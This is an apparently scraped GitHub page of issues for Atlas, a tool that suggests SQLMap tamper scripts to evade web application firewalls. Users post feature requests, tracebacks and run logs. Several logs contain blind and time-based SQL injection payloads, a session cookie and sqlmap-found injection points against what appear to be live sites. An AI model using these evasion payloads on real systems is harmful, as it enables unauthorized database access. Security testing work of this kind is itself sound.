m4ll0k / atlas Goto Github PK
View Code? Open in Web Editor NEWQuick SQLMap Tamper Suggester
License: GNU General Public License v3.0
Quick SQLMap Tamper Suggester
License: GNU General Public License v3.0
suggest to add the function of read form a packet file just like sqlmap's -r
@m4ll0k PLZ. Update Atlas
Sqlmap still not provide full tamper suggester function (but sometimes it show what perhaps filtered and named usefull tamper)
But there is a great need to perform a post requests right . now in atlas it seems work not so fine.
Also import txt file with request from other soft is musthave . example -r command in sqlmap .
PLZ COME BACK. Cause still there is no alternatives in automated soft for that purposes.
I see @muminkoykiran is one who still intrested and pull that git. Man, maybe you can made update in fork for that functions?
hi, there
I'm getting this error and I have no idea why?
raceback (most recent call last):
File "/usr/lib/python3.9/urllib/request.py", line 1346, in do_open
h.request(req.get_method(), req.selector, req.data, headers,
File "/usr/lib/python3.9/http/client.py", line 1255, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.9/http/client.py", line 1301, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.9/http/client.py", line 1250, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.9/http/client.py", line 1010, in _send_output
self.send(msg)
File "/usr/lib/python3.9/http/client.py", line 950, in send
self.connect()
File "/usr/lib/python3.9/http/client.py", line 1417, in connect
super().connect()
File "/usr/lib/python3.9/http/client.py", line 921, in connect
self.sock = self._create_connection(
File "/usr/lib/python3.9/socket.py", line 822, in create_connection
for res in getaddrinfo(host, port, 0, SOCK_STREAM):
File "/usr/lib/python3.9/socket.py", line 953, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno 1] Unknown error
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/shinobi/Desktop/Tool/Atlas/atlas.py", line 337, in
atlas().main()
File "/home/shinobi/Desktop/Tool/Atlas/atlas.py", line 298, in main
);inject_payload.run()
File "/home/shinobi/Desktop/Tool/Atlas/atlas.py", line 41, in run
resp = self.send(url,self.method,self.data,injected.get('headers'))
File "/home/shinobi/Desktop/Tool/Atlas/lib/request.py", line 63, in send
resp = urllib2.urlopen(req)
File "/usr/lib/python3.9/urllib/request.py", line 214, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python3.9/urllib/request.py", line 517, in open
response = self._open(req, data)
File "/usr/lib/python3.9/urllib/request.py", line 534, in _open
result = self._call_chain(self.handle_open, protocol, protocol +
File "/usr/lib/python3.9/urllib/request.py", line 494, in _call_chain
result = func(*args)
File "/usr/lib/python3.9/urllib/request.py", line 1389, in https_open
return self.do_open(http.client.HTTPSConnection, req,
File "/usr/lib/python3.9/urllib/request.py", line 1349, in do_open
raise URLError(err)
urllib.error.URLError: <urlopen error [Errno 1] Unknown error>
after running
python atlas.py
i ger this error
File "atlas.py", line 20 def __init__(self,url:str,method:str,data:str,kwargs:dict)->None: ^ SyntaxError: invalid syntax
any suggestions??
thanks
python2 atlas.py -v -r -m GET -u "http://event.test.com.us/index.php/event/start/3" -p "3'"
[*] Starting at 05:32:27
[05:32:27] [INFO] testing connection to the target URL...
[05:32:27] [INFO] checking if the payload is blocked by some kind of WAF/IDS/IPS..
Traceback (most recent call last):
File "atlas.py", line 265, in <module>
atlas().main()
File "atlas.py", line 201, in main
url,method,data,kwargs
File "atlas.py", line 32, in run
for url in testable.run():
File "/data/data/com.termux/files/home/atlas/lib/params.py", line 29, in run
elif '=' not in self.url and '=' in self.data:self.post()
TypeError: argument of type 'NoneType' is not iterable
$
The author's project idea is very good.。
IP is always blocked in practice,The program is interrupted because of this。
It would be better if you can add a proxy function that sends data packets every time you request。≧◔◡◔≦
Traceback (most recent call last):
File "C:\upsqlmap\atlas.py", line 16, in
from humanfriendly.tables import format_pretty_table as pretty
ModuleNotFoundError: No module named 'humanfriendly'
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/tools.html#Atlas
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool and improve its referencing.
The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make our open project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care. Else you can close this issue.
Hello.
plz add a shell (constant menu like --sqlmap-shell) for working in powershell in win os. it will be very helpfull - little hard to alias comand for atlas.py (maybe someone can help)
i made a bat file --
powershell -NoExit py 'C:\Users*\Desktop\Atlas-master\atlas.py'"
but i need again write py atlas.py -comand.. Dunnow how to make it perfect and easy for work in winpwshl
Thanks for your work!
Do you not update this tool anymore?
got an error while running on Ubuntu 16.04 and Python 2.7.2
ppayload = param.replace(param.split('=')[1],self.payload)
IndexError: list index out of range
python atlas.py
Traceback (most recent call last):
File "/home/user/atlas/atlas.py", line 16, in
from humanfriendly.tables import format_pretty_table as pretty
ModuleNotFoundError: No module named 'humanfriendly'
I typed python3 atlas.py
and I got back:
Traceback (most recent call last): File "C:\***\***\***\Atlas-master\atlas.py", line 16, in <module> from humanfriendly.tables import format_pretty_table as pretty ModuleNotFoundError: No module named 'humanfriendly'
The exact version of python that I'm using is 3.9.1
As a side question, which version of python is Atlas currently on?
Hi There,
Kindly add the option of --update.
i made a small code for you and gonna send it to you privately.
Regards,
-u "xxx.com?p=123&fq=1233" -D "test=testtest&test2=testabc"
What if I only want to test POST parameter test2
?
What should I enter? -p "testabc'"
or -p "test2=testabc'"
or what?
[12:21:12] [INFO] fetching current database
[12:21:12] [PAYLOAD] 1 AnD ORD(MID((IFnuLL(CAsT(DatABaSe() aS cHAR),0x20)),1,1))>64
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 And ORD(MID((ifNUll(cAst(DATabAse() As chaR),0x20)),1,1))>32
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 anD ORD(MID((IFNulL(cAsT(DatabaSe() As CHar),0x20)),1,1))>1
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [INFO] retrieved:
[12:21:12] [DEBUG] performed 3 queries in 0.14 seconds
[12:21:12] [PAYLOAD] 1 AnD 9517=iF((ORD(MID((iFNULL(CAsT(dATabaSE() aS CHar),0x20)),1,1))>64),SLEEP(5),9517)
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 And 9517=If((ORD(MID((IfNULL(CAst(DataBAse() aS CHaR),0x20)),1,1))>32),SLEEP(5),9517)
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 aNd 9517=iF((ORD(MID((iFNULL(CAst(dATabasE() aS cHAR),0x20)),1,1))>1),SLEEP(5),9517)
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [INFO] retrieved:
[12:21:12] [DEBUG] performed 3 queries in 0.06 seconds
[12:21:12] [CRITICAL] unable to retrieve the database names
python2 atlas.py -r -u "canttellyou.com/sor.php?AnnouncementID=1&ct=undefined" -p "1 And 9517=If((ORD(MID((IfNULL(CAst(DataBAse() aS CHaR),0x20)),1,1))>32),SLEEP(5),9517)" -c "ck_okok_okoklogin=1; PHPSESSID=dudm31qshvu2qm2w2w2w2w2w"
[�[1;35m19:46:39�[0m] [�[1;33mINFO�[0m] �[0;33mtrying with "randomcase" tamper...�[0m
Traceback (most recent call last):
File "atlas.py", line 265, in <module>
atlas().main()
File "atlas.py", line 221, in main
payload__ = tamper(_payload)
File "D:\atlas\tamper\general_randomcase.py", line 22, in general_randomcase
m_word = word[random.randint(0,len(word))]
IndexError: string index out of range
D:\atlas>
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AnnouncementID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AnnouncementID=1 AND 2143=2143&ct=undefined
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: AnnouncementID=1 AND SLEEP(5)&ct=undefined
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
banner: '5.0.95-log'
Hi,
I tried atlas header as -H 'Cookie: abc=1234; qwe=222-211-2'+%%inject%%'
--payload=blah
And seperately;
-H 'Cookie: abc=1234' -H 'Cookie=qwe=222-211-2'+%%inject%%'
--payload=blah
But the response is same as this for both requests and results to all the scripts
trying with "charunicodeencode" tamper...
python3 atlas.py --url https://abcp.com/;jsessionid=A33675EEFC516F7C144BBD178675E69F?next=user/anonWorkItemEdit.jsp&id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
[23:15:46] [WARN] Please set payload with "-p|--payload" options
[1]+ Done jsessionid=A33675EEFC516F7C144BBD178675E69F?next=user/anonWorkItemEdit.jsp
[1] 4042
-bash: --payload=-1234 AND 4321=4321-- AAAA: command not found
How to use this if the site using route parameter ?
eg:
https://sqli.tk/News/1
In sqlmap via *
can we add multiple urls in the tool
Suggest to add argument for error code because some waf's dont return 4xx-5xx error, some return 302 for example so i want to set this argument. Thanx
python3 atlas.py
Traceback (most recent call last):
File "atlas.py", line 16, in
from humanfriendly.tables import format_pretty_table as pretty
ModuleNotFoundError: No module named 'humanfriendly'
the script is running great Thanks , but i get weird charchters when running , its bluring my eyes :)
[←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "406"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "400"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "400"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "400"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "406"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "406"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "406"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "400"←[0m [←[1;35m08:33:20←[0m] [←[1;33mINFO←[0m] ←[0;33mtrying with "uppercase" tamper...←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "406"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "406"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "400"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "400"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "400"←[0m [←[1;35m08:33:20←[0m] [←[0;31mWARN←[0m] ←[1;31mreturn HTTP error code: "406"←[0m
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.